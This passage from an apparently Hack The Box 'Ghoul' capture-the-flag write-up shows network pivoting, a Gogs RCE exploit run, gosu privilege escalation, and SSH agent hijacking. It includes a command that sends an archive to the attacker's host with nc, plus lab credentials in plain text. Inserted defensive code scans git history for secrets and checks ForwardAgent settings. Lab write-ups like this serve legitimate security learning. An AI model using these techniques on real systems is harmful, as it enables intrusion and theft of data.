<tomcat-users>
    <user username="admin" password="admin" roles="admin"/>
    <role rolename="admin"/>
</tomcat-users>



So that gives us 123456, password123 and test@aogiri123. Maybe we'll need them later.

I checked the other interfaces:


root@Aogiri:/home/noro# ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.20.0.10 netmask 255.255.0.0 broadcast 172.20.255.255

ether 02:42:ac:14:00:0a txqueuelen 0 (Ethernet)

RX packets 54427 bytes 10267568 (10.2 MB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 49877 bytes 43322005 (43.3 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

loop txqueuelen 1000 (Local Loopback)

RX packets 467 bytes 46415 (46.4 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 467 bytes 46415 (46.4 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



root@Aogiri:/home/noro#



Aogiri's IP on eth0 is 172.20.0.10. We need to know what other hosts are live on that subnet, so we will do a simple ping sweep:


root@Aogiri:~# for i in {1..255}; do ping -c 1 172.20.0.$i; done | grep 'ttl='

64 bytes from 172.20.0.1: icmp_seq=0 ttl=64 time=0.109 ms

64 bytes from 172.20.0.10: icmp_seq=0 ttl=64 time=0.066 ms

64 bytes from 172.20.0.150: icmp_seq=0 ttl=64 time=0.272 ms

root@Aogiri:~#



We got 172.20.0.150 and need to scan it for open ports. Neither nmap nor nc was installed, so I got a static build of nc and uploaded it:


root@Aogiri:/tmp# wget http://10.10.xx.xx/nc

--2019-10-04 13:05:16-- http://10.10.xx.xx/nc

Connecting to 10.10.xx.xx:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 959800 (937K) [application/octet-stream]

Saving to: ‘nc’

nc 100%[=====================================================================================================================>] 937.30K 242KB/s in 5.3s

2019-10-04 13:05:22 (177 KB/s) - ‘nc’ saved [959800/959800]

root@Aogiri:/tmp#



I scanned the first 1000 ports and SSH was open:


root@Aogiri:/tmp# ./nc -zv 172.20.0.150 1-1000

64978af526b2.Aogiri [172.20.0.150] 22 (ssh) open

root@Aogiri:/tmp#



Assuming that 172.20.0.150 is kaneki-pc, we can use kaneki's private key to SSH in as kaneki_pub. But there was a problem: the key is encrypted:


-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,9E9E4E88793BC9DB54A767FC0216491F




-----END RSA PRIVATE KEY-----



I tried to crack the key but couldn't find the passphrase in rockyou. Then I remembered /secret.php, where Noro asked Kaneki for access and Kaneki replied with a weird string that looked like a password (ILoveTouka):



I tried that as the key passphrase and it worked:


root@kali:~/Desktop/HTB/boxes/ghoul# nano kaneki.key

root@kali:~/Desktop/HTB/boxes/ghoul# chmod 600 kaneki.key

root@kali:~/Desktop/HTB/boxes/ghoul# ssh -i kaneki.key kaneki@ghoul.htb

Enter passphrase for key 'kaneki.key':

Last login: Fri Oct 4 11:40:26 2019 from 10.10.15.168

kaneki@Aogiri:~$



Since I'm going to tunnel stuff, I echoed my public key into /root/.ssh/authorized_keys and got SSH as root:



I forwarded port 22 of 172.20.0.150 to local port 2020, then SSHed into kaneki-pc as kaneki_pub:


root@kali:~/Desktop/HTB/boxes/ghoul# ssh -i id_rsa -L 2020:172.20.0.150:22 root@ghoul.htb

Last login: Fri Oct 4 13:13:00 2019 from 10.10.xx.xx

root@Aogiri:~#




root@kali:~/Desktop/HTB/boxes/ghoul# ssh kaneki_pub@localhost -p 2020 -i ./kaneki.key

Enter passphrase for key './kaneki.key':

Last login: Fri Oct 4 11:35:41 2019 from 172.20.0.10

kaneki_pub@kaneki-pc:~$



RCE in gogs, Pivoting from kaneki-pc to git

There was a text file called to-do.txt in the home directory:


kaneki_pub@kaneki-pc:~$ ls -la

total 40

drwx------ 3 kaneki_pub kaneki_pub 4096 Dec 16 2018 .

drwxr-xr-x 1 root root 4096 Dec 16 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 kaneki_pub kaneki_pub 220 Dec 16 2018 .bash_logout

-rwx------ 1 kaneki_pub kaneki_pub 3771 Dec 16 2018 .bashrc

-rwx------ 1 kaneki_pub kaneki_pub 807 Dec 16 2018 .profile

drwx------ 2 kaneki_pub kaneki_pub 4096 Dec 16 2018 .ssh

-rw------- 1 kaneki_pub kaneki_pub 3139 Dec 16 2018 .viminfo

-rw-r--r-- 1 kaneki_pub kaneki_pub 165 Dec 16 2018 .wget-hsts

-rw-r--r-- 1 root root 44 Dec 16 2018 to-do.txt

kaneki_pub@kaneki-pc:~$ cat to-do.txt

Give AogiriTest user access to Eto for git.

kaneki_pub@kaneki-pc:~$



On Aogiri there was a hint about a vulnerability in Gogs:


root@Aogiri:/home/kaneki# cat note.txt

Vulnerability in Gogs was detected. I shutdown the registration function on our server, please ensure that no one gets access to the test accounts.



A painless self-hosted Git service. -gogs.io

I checked the interfaces and there was a new subnet:


kaneki_pub@kaneki-pc:~$ ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.20.0.150 netmask 255.255.0.0 broadcast 172.20.255.255

ether 02:42:ac:14:00:96 txqueuelen 0 (Ethernet)

RX packets 8644 bytes 924940 (924.9 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 5908 bytes 2135441 (2.1 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 172.18.0.200 netmask 255.255.0.0 broadcast 172.18.255.255

ether 02:42:ac:12:00:c8 txqueuelen 0 (Ethernet)

RX packets 1650 bytes 2723948 (2.7 MB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 1684 bytes 352910 (352.9 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

loop txqueuelen 1000 (Local Loopback)

RX packets 25 bytes 1661 (1.6 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 25 bytes 1661 (1.6 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0



kaneki_pub@kaneki-pc:~$



So I ran another ping sweep:


kaneki_pub@kaneki-pc:~$ for i in {1..255}; do ping -c 1 172.18.0.$i; done | grep 'ttl='

64 bytes from 172.18.0.1: icmp_seq=0 ttl=64 time=0.125 ms

64 bytes from 172.18.0.2: icmp_seq=0 ttl=64 time=0.146 ms

64 bytes from 172.18.0.200: icmp_seq=0 ttl=64 time=0.054 ms



And again I downloaded nc to scan the discovered host (172.18.0.200):


kaneki_pub@kaneki-pc:/tmp$ wget http://172.20.0.10:8888/nc

--2019-10-04 13:37:59-- http://172.20.0.10:8888/nc

Connecting to 172.20.0.10:8888... connected.

HTTP request sent, awaiting response... 200 OK

Length: 959800 (937K) [application/octet-stream]

Saving to: ‘nc’

nc 100%[=====================================================================================================================>] 937.30K --.-KB/s in 0.006s

2019-10-04 13:37:59 (161 MB/s) - ‘nc’ saved [959800/959800]

kaneki_pub@kaneki-pc:/tmp$




kaneki_pub@kaneki-pc:/tmp$ ./nc -zv 172.18.0.2 1-10000

cuff_web_1.cuff_default [172.18.0.2] 22 (ssh) open

cuff_web_1.cuff_default [172.18.0.2] 3000 open

kaneki_pub@kaneki-pc:/tmp$



Port 3000 is the default port for Gogs. I forwarded it to Aogiri and then from Aogiri to my machine:


root@Aogiri:~# ssh -L 3000:172.18.0.2:3000 -i /home/kaneki/.ssh/id_rsa kaneki_pub@172.20.0.150

Enter passphrase for key '/home/kaneki/.ssh/id_rsa':

Last login: Fri Oct 4 13:38:45 2019 from 172.20.0.10

kaneki_pub@kaneki-pc:~$




root@kali:~/Desktop/HTB/boxes/ghoul# ssh -L 3000:127.0.0.1:3000 -i kaneki.key kaneki@ghoul.htb

Enter passphrase for key 'kaneki.key':

Last login: Fri Oct 4 13:42:14 2019 from 10.10.15.168

kaneki@Aogiri:~$





We already have the username AogiriTest. I tried the password I got from tomcat-users.xml (test@aogiri123) and it worked:





The hint said that this version of gogs was vulnerable, so I cloned gogsownz and tried to exploit the RCE vulnerability:

root@kali:~/Desktop/HTB/boxes/ghoul# git clone https://github.com/TheZ3ro/gogsownz.git
Cloning into 'gogsownz'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 11 (delta 2), reused 5 (delta 0), pack-reused 0
Unpacking objects: 100% (11/11), done.
root@kali:~/Desktop/HTB/boxes/ghoul#



root@kali:~/Desktop/HTB/boxes/ghoul/gogsownz# python3 gogsownz.py -v http://127.0.0.1:3000/ -C 'AogiriTest':'test@aogiri123' -n i_like_gogits --rce 'wget http://10.10.xx.xx' --cleanup
[i] Starting Gogsownz on: http://127.0.0.1:3000
[+] Loading Gogs homepage
[i] Gogs Version installed: © 2018 Gogs Version: 0.11.66.0916
[i] The Server is redirecting on the login page. Probably REQUIRE_SIGNIN_VIEW is enabled so you will need an account.
[+] Performing login
[+] Logged in sucessfully as AogiriTest
[+] Got UserID 2
[+] Repository created sucessfully
[i] Exploiting authenticated PrivEsc...
[+] Uploading admin session as repository file
[+] Uploaded successfully.
[+] Committing the Admin session
[+] Committed sucessfully
[+] Removing Repo evidences
[+] Repo removed sucessfully
[i] Signed in as kaneki, is admin True
[i] Current session cookie: '638cb471cd001337'
[+] Got UserID 1
[+] Repository created sucessfully
[+] Setting Git hooks
[+] Git hooks set sucessfully
[+] Fetching last commit...
[+] Got last commit
[+] Triggering the RCE with a new commit
[+] Committed sucessfully
[i] Performed RCE successfully
[i] Waiting 10 seconds before cleaning up...
[+] Removing Repo evidences
[+] Repo removed sucessfully
[i] Done!
root@kali:~/Desktop/HTB/boxes/ghoul/gogsownz#



root@kali:~/Desktop/HTB/boxes/ghoul# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.101 - - [04/Oct/2019 16:41:19] "GET / HTTP/1.1" 200 -

It worked, time to get a reverse shell:



Privilege Escalation from git to root, Getting aogiri-app.7z

Unfortunately python wasn’t installed on the host, so I set up ssh access instead to get a better shell.

cd /home
ls -la
total 8
drwxr-xr-x 1 root root 4096 Oct 4 14:45 .
drwxr-xr-x 1 root root 4096 Dec 13 2018 ..
lrwxrwxrwx 1 root root 9 Oct 4 14:45 git -> /data/git
cd git
ls -la
total 20
drwxr-xr-x 4 git git 4096 Oct 4 14:45 .
drwxr-xr-x 5 git git 4096 Dec 13 2018 ..
lrwxrwxrwx 1 git git 9 Dec 29 2018 .bash_history -> /dev/null
-rw-r--r-- 1 git git 71 Oct 4 14:45 .gitconfig
drwx------ 2 git git 4096 Dec 13 2018 .ssh
drwxr-xr-x 4 git git 4096 Dec 13 2018 gogs-repositories
cd .ssh
ls -la
total 12
drwx------ 2 git git 4096 Dec 13 2018 .
drwxr-xr-x 4 git git 4096 Oct 4 14:45 ..
-rw------- 1 git git 23 Dec 13 2018 environment
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsiPbWC8feNW7o6emQUk12tFOcucqoS/nnKN/LM3hCtPN8r4by8Ml1IR5DctjeurAmlJtXcn8MqlHCRbR6hZKydDwDzH3mb6M/gCYm4fD9FppbOdG4xMVGODbTTPV/h2Lh3ITRm+xNHYDmWG84rQe++gJImKoREkzsUNqSvQv4rO1RlO6W3rnz1ySPAjZF5sloJ8Rmnk+MK4skfj00Gb2mM0/RNmLC/rhwoUC+Wh0KPkuErg4YlqD8IB7L3N/UaaPjSPrs2EDeTGTTFI9GdcT6LIaS65CkcexWlboQu3DDOM5lfHghHHbGOWX+bh8VHU9JjvfC8hDN74IvBsy120N5 kaneki@kaneki-pc" > authorized_keys
ls -la
total 16
drwx------ 2 git git 4096 Oct 4 14:52 .
drwxr-xr-x 4 git git 4096 Oct 4 14:45 ..
-rw-r--r-- 1 git git 398 Oct 4 14:52 authorized_keys
-rw------- 1 git git 23 Dec 13 2018 environment
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsiPbWC8feNW7o6emQUk12tFOcucqoS/nnKN/LM3hCtPN8r4by8Ml1IR5DctjeurAmlJtXcn8MqlHCRbR6hZKydDwDzH3mb6M/gCYm4fD9FppbOdG4xMVGODbTTPV/h2Lh3ITRm+xNHYDmWG84rQe++gJImKoREkzsUNqSvQv4rO1RlO6W3rnz1ySPAjZF5sloJ8Rmnk+MK4skfj00Gb2mM0/RNmLC/rhwoUC+Wh0KPkuErg4YlqD8IB7L3N/UaaPjSPrs2EDeTGTTFI9GdcT6LIaS65CkcexWlboQu3DDOM5lfHghHHbGOWX+bh8VHU9JjvfC8hDN74IvBsy120N5 kaneki@kaneki-pc



kaneki_pub@kaneki-pc:~$ ssh -i .ssh/id_rsa git@172.18.0.2
Enter passphrase for key '.ssh/id_rsa':
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

3713ea5e4353:~$



I couldn’t find anything useful, so I had to escalate to root. After some regular enumeration I checked the SUID binaries:

3713ea5e4353:~$ find / -perm -4000 2>/dev/null
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/expiry
/usr/sbin/gosu
/bin/su
3713ea5e4353:~$



gosu was interesting: it is a SUID binary that runs a command as any given user, root included, so I used it to spawn bash as root:

3713ea5e4353:~$ gosu
Usage: gosu user-spec command [args]
ie: gosu tianon bash
gosu nobody:root bash -c 'whoami && id'
gosu 1000:1 id

gosu version: 1.10 (go1.7.1 on linux/amd64; gc)
license: GPL-3 (full text at https://github.com/tianon/gosu)

3713ea5e4353:~$ gosu root bash
3713ea5e4353:/data/git# whoami
root
3713ea5e4353:/data/git#



I checked the root directory and found a bash script called session.sh:

3713ea5e4353:~# ls -la
total 128
drwx------ 1 root root 4096 Dec 29 2018 .
drwxr-xr-x 1 root root 4096 Dec 13 2018 ..
lrwxrwxrwx 1 root root 9 Dec 29 2018 .ash_history -> /dev/null
lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null
-rw-r--r-- 1 root root 117507 Dec 29 2018 aogiri-app.7z
-rwxr-xr-x 1 root root 179 Dec 16 2018 session.sh
3713ea5e4353:~#

while true
do
    sleep 300
    rm -rf /data/gogs/data/sessions
    sleep 2
    curl -d 'user_name=kaneki&password=12345ILoveTouka!!!' http://172.18.0.2:3000/user/login
done



This script runs in an endless loop: every five minutes it deletes the gogs session store and then logs back in as kaneki, which is what keeps terminating the active sessions. I saved the password because we may need it later.

The other thing was a 7z archive called aogiri-app.7z; I used nc to download it to my box:

3713ea5e4353:~# nc -w 3 10.10.xx.xx 1338 < aogiri-app.7z
3713ea5e4353:~# md5sum aogiri-app.7z
88e134a69f8c2f96de31581a52895c07 aogiri-app.7z
3713ea5e4353:~#

root@kali:~/Desktop/HTB/boxes/ghoul# nc -lp 1338 > aogiri-app.7z
root@kali:~/Desktop/HTB/boxes/ghoul# md5sum aogiri-app.7z
88e134a69f8c2f96de31581a52895c07 aogiri-app.7z
root@kali:~/Desktop/HTB/boxes/ghoul#



Searching Through git Commits, Privilege Escalation on kaneki-pc

I created a directory called aogiri-app and extracted the archive there:

root@kali:~/Desktop/HTB/boxes/ghoul# mkdir aogiri-app
root@kali:~/Desktop/HTB/boxes/ghoul# cd aogiri-app/
root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app# cp ../aogiri-app.7z .
root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app# 7za x ./aogiri-app.7z

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on)

Scanning the drive for archives:
1 file, 117507 bytes (115 KiB)

Extracting archive: ./aogiri-app.7z
--
Path = ./aogiri-app.7z
Type = 7z
Physical Size = 117507
Headers Size = 4011
Method = LZMA2:192k
Solid = +
Blocks = 1

Everything is Ok

Folders: 114
Files: 125
Size: 154976
Compressed: 117507
root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app# ls -la
total 128
drwxr-xr-x 3 root root 4096 Oct 4 17:00 .
drwxr-xr-x 4 root root 4096 Oct 4 16:59 ..
-rw-r--r-- 1 root root 117507 Oct 4 17:00 aogiri-app.7z
drwxr-xr-x 5 root root 4096 Dec 29 2018 aogiri-chatapp
root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app#



By looking at the extracted files we’ll see that it’s a git repository:

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp# ls -la
total 52
drwxr-xr-x 5 root root 4096 Dec 29 2018 .
drwxr-xr-x 3 root root 4096 Oct 4 17:00 ..
drwxr-xr-x 8 root root 4096 Dec 29 2018 .git
-rw-r--r-- 1 root root 268 Dec 29 2018 .gitignore
drwxr-xr-x 3 root root 4096 Dec 29 2018 .mvn
-rwxr-xr-x 1 root root 9113 Dec 29 2018 mvnw
-rw-r--r-- 1 root root 5810 Dec 29 2018 mvnw.cmd
-rw-r--r-- 1 root root 2111 Dec 29 2018 pom.xml
-rw-r--r-- 1 root root 124 Dec 29 2018 README.md
drwxr-xr-x 4 root root 4096 Dec 29 2018 src
root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp#



And honestly this was a very big rabbit hole: I kept searching through the application code for a long time (it was useless and I couldn’t get anything from it), while the real lead was the git repository itself.

Let’s check the reflog to get the commits:

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp# git reflog
647c5f1 (HEAD -> master, origin/master) HEAD@{0}: commit: changed service
b43757d HEAD@{1}: commit: added mysql deps
b3752e0 HEAD@{2}: reset: moving to b3752e0
0d426b5 HEAD@{3}: reset: moving to 0d426b5
e29ad43 HEAD@{4}: reset: moving to HEAD^
0d426b5 HEAD@{5}: reset: moving to HEAD
0d426b5 HEAD@{6}: reset: moving to origin/master
0d426b5 HEAD@{7}: commit: update dependencies
e29ad43 HEAD@{8}: commit: added service
b3752e0 HEAD@{9}: commit: noro stop doing stupid shit
813e0a5 HEAD@{10}: commit: hello world!
ed5a88c HEAD@{11}: commit: mysql support
51d2c36 HEAD@{12}: commit: added readme
bec96aa HEAD@{13}: commit: updated dependencies
8b74520 HEAD@{14}: commit (initial): update readme



I checked each commit, and in one of them (0d426b5) I found some passwords:

root@kali:~/Desktop/HTB/boxes/ghoul/aogiri-app/aogiri-chatapp# git show 0d426b5
commit 0d426b533d4f1877f8a114620be8a1294f34ab71
Author: kaneki <kaneki@aogiri.htb>
Date: Sat Dec 29 11:44:50 2018 +0530

update dependencies

diff --git a/pom.xml b/pom.xml
index 92f24ee..fc1d313 100644
--- a/pom.xml
+++ b/pom.xml
@@ -48,6 +48,11 @@
<artifactId>javax.json</artifactId>
<version>1.0</version>
</dependency>
+ <dependency>
+ <groupId>mysql</groupId>
+ <artifactId>mysql-connector-java</artifactId>
+ <version>5.1.46</version>
+ </dependency>

</dependencies>

diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 4cbc10b..41adeb0 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,7 +1,7 @@
server.port=8080
spring.datasource.url=jdbc:mysql://localhost:3306/db
-spring.datasource.username=kaneki
-spring.datasource.password=7^Grc%C\7xEQ?tb4
+spring.datasource.username=root
+spring.datasource.password=g_xEN$ZuWD7hJf2G
server.address=0.0.0.0

spring.jpa.properties.hibernate.dialect = org.hibernate.dialect.MySQL5InnoDBDialect
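Review bot: the application.properties hunk commits a plaintext database password and at the same time switches the application to the MySQL root account (`+spring.datasource.username=root`, `+spring.datasource.password=g_xEN$ZuWD7hJf2G`); neither belongs in the repository. Read the credential from the environment instead (Spring resolves placeholders such as `spring.datasource.password=${DB_PASSWORD}`) and keep a dedicated, least-privilege database user rather than root. Note also that the removed line `-spring.datasource.password=7^Grc%C\7xEQ?tb4` stays in history after this commit, which is exactly how it was recovered here, so both passwords have to be treated as exposed and rotated; editing the file is not enough.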
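A small scanner for exactly this failure mode, added here as an example (it is not the author's or the project's code): it walks `git log -p --all` or `git show` output and reports credential-looking property lines whether they were added or removed, because a password deleted in a later commit is still in history, as it was here. The sample diff is constructed, and the `git` invocation under `__main__` assumes git is on PATH and the current directory is inside the repository.

```python
"""Scan `git log -p --all` / `git show` text for credential-looking lines (added example; sample diff is constructed)."""
import re
import subprocess
import sys

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})")
FILE_RE = re.compile(r"^diff --git a/(\S+) b/(\S+)")
# property-style keys that usually carry secrets, followed by '=' or ':' and a value
SECRET_RE = re.compile(r"(?i)\b([\w.\-]*(?:password|passwd|secret|token|api[_-]?key))\s*[=:]\s*(\S+)")

def mask(value):
    """Keep a two-character prefix so the report itself does not leak the secret."""
    return value[:2] + "*" * max(len(value) - 2, 1)

def scan_history(text):
    """One finding per credential line, for added (+) and removed (-) lines alike:
    a password deleted in a later commit is still recoverable from history."""
    findings, commit, path = [], None, None
    for line in text.splitlines():
        if m := COMMIT_RE.match(line):
            commit = m.group(1)[:7]
        elif m := FILE_RE.match(line):
            path = m.group(2)
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            if m := SECRET_RE.search(line[1:]):  # skip the diff file headers, keep +/- lines
                findings.append({"commit": commit, "file": path,
                                 "change": "added" if line[0] == "+" else "removed",
                                 "key": m.group(1), "value": mask(m.group(2))})
    return findings

# constructed sample in `git show` format; the hash and both passwords are placeholders
SAMPLE = """\
commit abc1234def5678901234567890abcdef12345678
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,4 +1,4 @@
 server.port=8080
-spring.datasource.username=appuser
-spring.datasource.password=OldPass-CONSTRUCTED
+spring.datasource.username=root
+spring.datasource.password=NewPass-CONSTRUCTED
"""

if __name__ == "__main__":
    # real use (assumes git on PATH and cwd inside the repo): `git log -p --all` covers every branch
    text = SAMPLE if "--sample" in sys.argv else subprocess.run(
        ["git", "log", "-p", "--all"], capture_output=True, text=True, check=True).stdout
    for finding in scan_history(text):
        print(finding)
```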



The only host that hasn’t been rooted yet is kaneki-pc, so I tried the two passwords and 7^Grc%C\7xEQ?tb4 worked. However, still no flag:

kaneki_pub@kaneki-pc:~$ su
Password:
root@kaneki-pc:/home/kaneki_pub# cd /root/
root@kaneki-pc:~# cat root.txt
You've done well to come upto here human. But what you seek doesn't lie here. The journey isn't over yet.....
root@kaneki-pc:~#



Hijacking the SSH Forward Agent, Root Flag

By checking the /tmp directory I saw some directories named ssh-RandomString:

root@kaneki-pc:~# cd /tmp/
root@kaneki-pc:/tmp# ls -la
total 28
drwxrwxrwt 1 root root 4096 Oct 4 15:06 .
drwxr-xr-x 1 root root 4096 Oct 4 14:45 ..
drwx------ 1 root root 4096 Dec 16 2018 ssh-1Oo5P5JuouKm
drwx------ 1 kaneki_adm kaneki_adm 4096 Dec 16 2018 ssh-FWSgs7xBNwzU
drwx------ 1 kaneki_pub kaneki 4096 Dec 16 2018 ssh-jDhFSu7EeAnz
-rw------- 1 root root 400 Oct 4 14:45 sshd-stderr---supervisor-E5awkI.log
-rw------- 1 root root 0 Oct 4 14:45 sshd-stdout---supervisor-3bRi58.log
root@kaneki-pc:/tmp#



And by checking the processes I found that kaneki_adm periodically runs an ssh command to 172.18.0.1 as root (root@172.18.0.1, port 2222):

root@kaneki-pc:/tmp# ps aux | grep ssh
root 10 0.0 0.1 72296 6116 pts/0 S 14:45 0:00 /usr/sbin/sshd -D
root 15 0.0 0.1 74656 6536 ? Ss 14:48 0:00 sshd: kaneki_pub [priv]
kaneki_+ 17 0.0 0.0 74792 4008 ? S 14:48 0:00 sshd: kaneki_pub@pts/2
root 101 0.1 0.1 74656 6572 ? Ss 15:12 0:00 sshd: kaneki_adm [priv]
kaneki_+ 103 0.0 0.0 74656 3192 ? S 15:12 0:00 sshd: kaneki_adm@pts/1
kaneki_+ 104 0.1 0.1 45188 5400 pts/1 Ss+ 15:12 0:00 ssh root@172.18.0.1 -p 2222 -t ./log.sh
root 106 0.0 0.0 13212 1020 pts/2 S+ 15:12 0:00 grep --color=auto ssh
root@kaneki-pc:/tmp#



After searching for a while I found this article which explains it very well. I cleaned the /tmp directory:

root@kaneki-pc:/tmp# rm -rf ssh-*
root@kaneki-pc:/tmp# ls -la
total 16
drwxrwxrwt 1 root root 4096 Oct 4 15:13 .
drwxr-xr-x 1 root root 4096 Oct 4 14:45 ..
-rw------- 1 root root 400 Oct 4 14:45 sshd-stderr---supervisor-E5awkI.log
-rw------- 1 root root 0 Oct 4 14:45 sshd-stdout---supervisor-3bRi58.log
root@kaneki-pc:/tmp#



Then I waited for the ssh command to run again. After a few minutes a new agent socket was created:

root@kaneki-pc:/tmp# ls -la
total 20
drwxrwxrwt 1 root root 4096 Oct 4 15:30 .
drwxr-xr-x 1 root root 4096 Oct 4 14:45 ..
drwx------ 2 kaneki_adm kaneki_adm 4096 Oct 4 15:30 ssh-X2sLvGoeXy
-rw------- 1 root root 400 Oct 4 14:45 sshd-stderr---supervisor-E5awkI.log
-rw------- 1 root root 0 Oct 4 14:45 sshd-stdout---supervisor-3bRi58.log
root@kaneki-pc:/tmp# ls -la ssh-X2sLvGoeXy/
total 12
drwx------ 2 kaneki_adm kaneki_adm 4096 Oct 4 15:30 .
drwxrwxrwt 1 root root 4096 Oct 4 15:30 ..
srwxr-xr-x 1 kaneki_adm kaneki_adm 0 Oct 4 15:30 agent.490
root@kaneki-pc:/tmp#



I quickly hijacked it by pointing SSH_AUTH_SOCK at the forwarded agent’s socket:

root@kaneki-pc:/tmp# export SSH_AUTH_SOCK=/tmp/ssh-X2sLvGoeXy/agent.490
root@kaneki-pc:/tmp# ssh-add -l
2048 SHA256:U3NCrv1R4fOSeyIk3W0EcaAm81ETo4dcu5+FBbk3KxE /home/kaneki/.ssh/id_rsa (RSA)

Then I could ssh to 172.18.0.1 as root:
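On the defensive side, this works only because kaneki_adm's ssh client forwards its agent into a host where someone else is root. The following added example (not from the write-up; both configs are constructed) resolves ForwardAgent the way OpenSSH does, first matching value wins, which is why a global `ForwardAgent yes` at the top of ssh_config silently overrides a per-host `ForwardAgent no` further down, and shows the ProxyJump layout that avoids forwarding altogether.

```python
"""Resolve ForwardAgent like OpenSSH (first matching value wins). Added example; configs are constructed."""
from fnmatch import fnmatchcase
import re

def parse_ssh_config(text):
    """Split ssh_config into (host_patterns, options) blocks; lines before any Host apply to every host."""
    blocks = [(["*"], {})]
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key, value = parts[0].lower(), parts[1] if len(parts) > 1 else ""
        if key == "host":
            blocks.append((value.split(), {}))
        else:
            blocks[-1][1].setdefault(key, value)  # first occurrence inside a block wins too
    return blocks

def host_matches(patterns, hostname):
    """OpenSSH Host semantics: some positive pattern must match and no negated (!) one may."""
    if any(fnmatchcase(hostname, p[1:]) for p in patterns if p.startswith("!")):
        return False
    return any(fnmatchcase(hostname, p) for p in patterns if not p.startswith("!"))

def effective(blocks, hostname, key):
    """The first block that matches the host and sets the key wins; later blocks cannot override it."""
    for patterns, opts in blocks:
        if key in opts and host_matches(patterns, hostname):
            return opts[key]
    return None

def agent_forwarded_to(config, hostname):
    return (effective(parse_ssh_config(config), hostname, "forwardagent") or "no").lower() == "yes"

WEAK = """\
ForwardAgent yes        # global default placed first...
Host bastion
    ForwardAgent no     # ...so this never takes effect: ssh keeps the first value it read
"""
HARDENED = """\
Host bastion
    ForwardAgent no
Host *.internal.example.test
    ProxyJump bastion   # hop through the bastion; no agent socket is ever created on it
Host *
    ForwardAgent no     # defaults belong at the end
"""
```

Where forwarding cannot be avoided, loading the key with `ssh-add -c` makes every use of it through the forwarded socket prompt for confirmation on the originating machine.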



And we owned root !

That’s it, feedback is appreciated!

Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow me on twitter @Ahm3d_H3sham.

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Swagshop

Next Hack The Box write-up : Hack The Box - Writeup